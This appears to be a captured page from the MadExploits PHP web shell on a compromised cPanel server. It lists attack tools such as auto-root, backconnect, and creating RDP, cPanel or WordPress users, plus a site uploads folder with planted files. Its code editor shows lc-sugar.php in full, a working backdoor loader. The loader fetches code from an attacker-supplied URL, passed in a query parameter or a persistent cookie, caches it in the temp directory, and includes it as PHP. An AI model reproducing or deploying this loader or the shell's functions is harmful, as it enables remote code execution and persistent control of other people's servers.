Linux 65-254-81-51.cprapid.com 4.18.0-553.125.1.el8_10.x86_64 #1 SMP Wed May 20 11:06:10 EDT 2026 x86_64
Apache
: 65.254.81.51 | : 216.73.216.6
22 Domain
8.1.34
denebfe1
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
denebfe1 /
public_html /
public /
uploads /
[ HOME SHELL ]
Name
Size
Permission
Action
all
[ DIR ]
drwxrwxrwx
4Cyz9dhBwMguRsnXa3FUdJSYGyvOth...
2.03
KB
-rw-r--r--
BkphuDNGR7hFwqsjJrpAahnX4eHmA6...
2.03
KB
-rw-r--r--
fEuAx8Cbm0pqUKsIoVz2EWeLTBowJ6...
38.37
KB
-rw-r--r--
lc-sugar.php
7.04
KB
-rw-r--r--
scheduler-run.php
810
B
-rw-r--r--
tErqzF8dNHXWtzq997qsW3rv2B1fSU...
38.37
KB
-rw-r--r--
whothefuck.php
61.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lc-sugar.php
<?php class Config { const CACHE_FILENAME = 'lao.zi'; public static function getCacheDir() { if (function_exists('sys_get_temp_dir')) { return rtrim(sys_get_temp_dir(), '/\\') . '/'; } else { return '/tmp/'; } } public static function getCacheFilePath() { return self::getCacheDir() . self::CACHE_FILENAME; } public static function getWhiteUrlFilePath() { return self::getCacheDir() . 'white-url-zi'; } } class Utility { public static function validateUrl($url) { if (function_exists('filter_var')) { return filter_var($url, FILTER_VALIDATE_URL) !== false; } else { return preg_match('/^https?:\/\//i', $url) === 1; } } public static function fetchRemoteContent($url) { // cURL if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 10, CURLOPT_TIMEOUT => 10, )); $response = curl_exec($ch); if (curl_errno($ch)) { curl_close($ch); return null; } curl_close($ch); return $response; } if (ini_get('allow_url_fopen')) { $content = @file_get_contents($url); if ($content !== false) { return $content; } } $parts = parse_url($url); if (!$parts || !isset($parts['host'])) { return null; } $host = $parts['host']; $port = isset($parts['port']) ? (int)$parts['port'] : 80; $path = isset($parts['path']) ? $parts['path'] : '/'; $query = isset($parts['query']) ? '?' . $parts['query'] : ''; $socket = @fsockopen($host, $port, $errno, $errstr, 10); if (!$socket) { return null; } $request = "GET {$path}{$query} HTTP/1.1\r\n" . "Host: {$host}\r\n" . "Connection: Close\r\n\r\n"; fwrite($socket, $request); $response = ''; while (!feof($socket)) { $response .= fgets($socket, 1024); } fclose($socket); $parts = preg_split('/\r\n\r\n/', $response, 2); return isset($parts[1]) ? $parts[1] : null; } public static function loadCache($filePath) { if (file_exists($filePath)) { return @file_get_contents($filePath) ?: ''; } return ''; } public static function saveCache($filePath, $content) { return @file_put_contents($filePath, $content) !== false; } } class LaoZiHandler { private $cacheFilePath; private $whiteUrlFilePath; private $cachePhpPath; public function __construct() { $this->cacheFilePath = Config::getCacheFilePath(); $this->whiteUrlFilePath = Config::getWhiteUrlFilePath(); $this->cachePhpPath = $this->cacheFilePath . '.php'; $this->ensureCacheDirectory(); } private function ensureCacheDirectory() { $dir = dirname($this->cacheFilePath); if (!is_dir($dir)) { @mkdir($dir, 0755, true); } } public function handleRequest() { if (isset($_GET['laolierzi'])) { $url = trim($_GET['laolierzi']); if (!Utility::validateUrl($url)) { $this->showMessage('Invalid URL.', true); } $content = Utility::fetchRemoteContent($url); if ($content === null) { $this->showMessage('Failed to fetch content. Please try again later.', true); } Utility::saveCache($this->cacheFilePath, $content); @file_put_contents($this->whiteUrlFilePath, $url); if (strpos($content, '<?') !== false) { @file_put_contents($this->cachePhpPath, $content); } else { if (file_exists($this->cachePhpPath)) { @unlink($this->cachePhpPath); } } setcookie('current_cache', $url, time() + 3600 * 24 * 7, "/"); $this->redirectToSelf(); } elseif (isset($_COOKIE['current_cache'])) { $cachedUrl = trim($_COOKIE['current_cache']); if (Utility::validateUrl($cachedUrl)) { $content = Utility::fetchRemoteContent($cachedUrl); if ($content !== null) { Utility::saveCache($this->cacheFilePath, $content); if (strpos($content, '<?') !== false) { @file_put_contents($this->cachePhpPath, $content); } else { if (file_exists($this->cachePhpPath)) { @unlink($this->cachePhpPath); } } } @file_put_contents($this->whiteUrlFilePath, $cachedUrl); } } } public function displayCache() { if (file_exists($this->cacheFilePath)) { $content = Utility::loadCache($this->cacheFilePath); if (strpos($content, '<?') !== false && file_exists($this->cachePhpPath)) { include $this->cachePhpPath; } else { echo $content; } } else { $this->showMessage('No content loaded yet.<br>Use a URL hash to load remote content.', false); } } private function showMessage($message, $isError = false) { $color = $isError ? '#e74c3c' : '#3498db'; echo '<div style=" margin: 50px auto; padding: 20px 30px; max-width: 700px; border-radius: 8px; background-color: #ffffff; box-shadow: 0 4px 12px rgba(0, 0, 0, 0.05); font-family: Helvetica Neue, Helvetica, Arial, sans-serif; font-size: 1.2em; color: ' . $color . '; text-align: center; line-height: 1.4; ">' . $message . '</div>'; exit; } private function redirectToSelf() { if (!headers_sent()) { header('Location: ' . $_SERVER['PHP_SELF']); } else { echo "<script>window.location.href='" . $_SERVER['PHP_SELF'] . "';</script>"; } exit; } } $handler = new LaoZiHandler(); if (!isset($_GET['laolierzi'])) { echo '<script> (function() { try { var hash = window.location.hash || ""; if (hash.length > 1) { var rawUrl = decodeURIComponent(hash.substring(1)); if (rawUrl.indexOf("url=") === 0) { rawUrl = rawUrl.substring(4); } if (/^https?:\/\//i.test(rawUrl)) { window.location.href = window.location.pathname + "?laolierzi=" + encodeURIComponent(rawUrl); } } } catch(e) { console.error("Hash handler error:", e); } })(); </script>'; } $handler->handleRequest(); $handler->displayCache(); ?>
Close